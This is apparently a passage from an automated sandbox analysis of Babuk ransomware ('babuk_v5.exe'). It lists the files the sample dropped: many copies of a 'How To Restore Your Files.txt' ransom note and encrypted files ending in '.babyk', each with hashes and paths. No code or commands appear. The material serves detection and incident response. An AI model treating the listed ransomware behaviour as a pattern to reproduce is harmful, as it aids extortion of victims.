                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.522442628210813
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl+v+SypssrcZRzL3LDAWmvu7qmvfy/MGkBzOjxH+lzD1gKamXCcmUxNvEEn:OVytoR3LD/YYfsMGkBid+lzDDO0vtn
                                                                            MD5:CA5BA346088767C1F59793AC586828E1
                                                                            SHA1:FEE54D0B728DE48460E49C3FC87F280EB6B19682
                                                                            SHA-256:2A173B2608BCE32CB409B92883FB16CFBA9FC5EEDBB13D9BCE65FD4E666AE821
                                                                            SHA-512:877FB2C4C035DDB1FB404498710310CDCA2FDCFD4C5F9EB216F98EC892FE5971A701C37C408F9DCEF2B5434CFACDAEDDD8894C8B6D4B0DA445C8754801E9009E
                                                                            Malicious:false
                                                                            Preview: .....qhJ...7..H.gz.I{..`..(B..'!..eC?.8....[&..A...k.C...,...J..5.I...L.........k...#..q....h'.....u...K....{....M..J.-P..9....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.9777555046074
                                                                            Encrypted:false
                                                                            SSDEEP:192:fQXX56E1qcCku6AcawJpig8VVWAJh+nbSIwA30MyA:wABzcakUg8VVWoAnbSrA30MyA
                                                                            MD5:BFB07572D2BD2BC7E647AF3B8A2B4E4B
                                                                            SHA1:B3AC02E6D715B290DD0A9CF3C3F2439127F57CA2
                                                                            SHA-256:1585087C2A1B5A5EEA13F172ABA183350AC025D1B62A30A617612220AFE21A3F
                                                                            SHA-512:F8D3A2C87BD3E54091347DB5624FFAFA7FCBA65D0859C11C7BD7B954BB01534C7FC71C17FA0C1F8C251B9504B8CE2579CDB9C1102B067725DD278CDB50D7B8B1
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.542257899264048
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl2By2eG1BKLRC0syBKwLgRHm1Id7w9BNTCYR2EOKuRGrvW+Nc9UxNvEEn:mBoEgsRHm1+M9BNTBgEOKu+vWD0vtn
                                                                            MD5:D58EB523A2B5118E88393E48F109D8C4
                                                                            SHA1:37CF6B2D8CEA73B88B980DCBB24ED63E540D9F4B
                                                                            SHA-256:6BEFF51EEB12D620D672BC8687220A970E69EA6E7F4812DE725051242D7A8E20
                                                                            SHA-512:2BB9FE92EDBE61B5C9BB7A43C0ED03B95FADED735A1BFE30C108753DB5A92E7BBE732DD0A0697C518EC584EBFF6983B84A06B87FE574E76ECFF2B640D366EECB
                                                                            Malicious:false
                                                                            Preview: .........Or.`.{c..O'....$..C...h].KY...7....]d...tU&r..$PJ.@.r.<....0m{I.tvZ..?.......d.i...T.....v......A!....u.....w.D...iic....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977224592381339
                                                                            Encrypted:false
                                                                            SSDEEP:192:8ijQ1X3QxsUHnZxZHBodH+S22H6kuafaJLWzNaN7g8S7kK:nQVAFBodeSbH61azzNaNkb
                                                                            MD5:51F6EE2430619E444A9F227B8A62729D
                                                                            SHA1:CA86F67B05DDC2EA5E652DD4DD64237BB3BE4BD1
                                                                            SHA-256:00A357A90AE1BABC24D37656CF40C4F148B431DB6DBACD46DDE46A2A5F360E41
                                                                            SHA-512:A5F1C1A907E5607EFF3CA33F9123D7A8296A13D44B7116B1F06D0FECF0B2EEF91376724A6FF6E36AF6E332793EFC8A654609193F142965438A7B309F96B51160
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
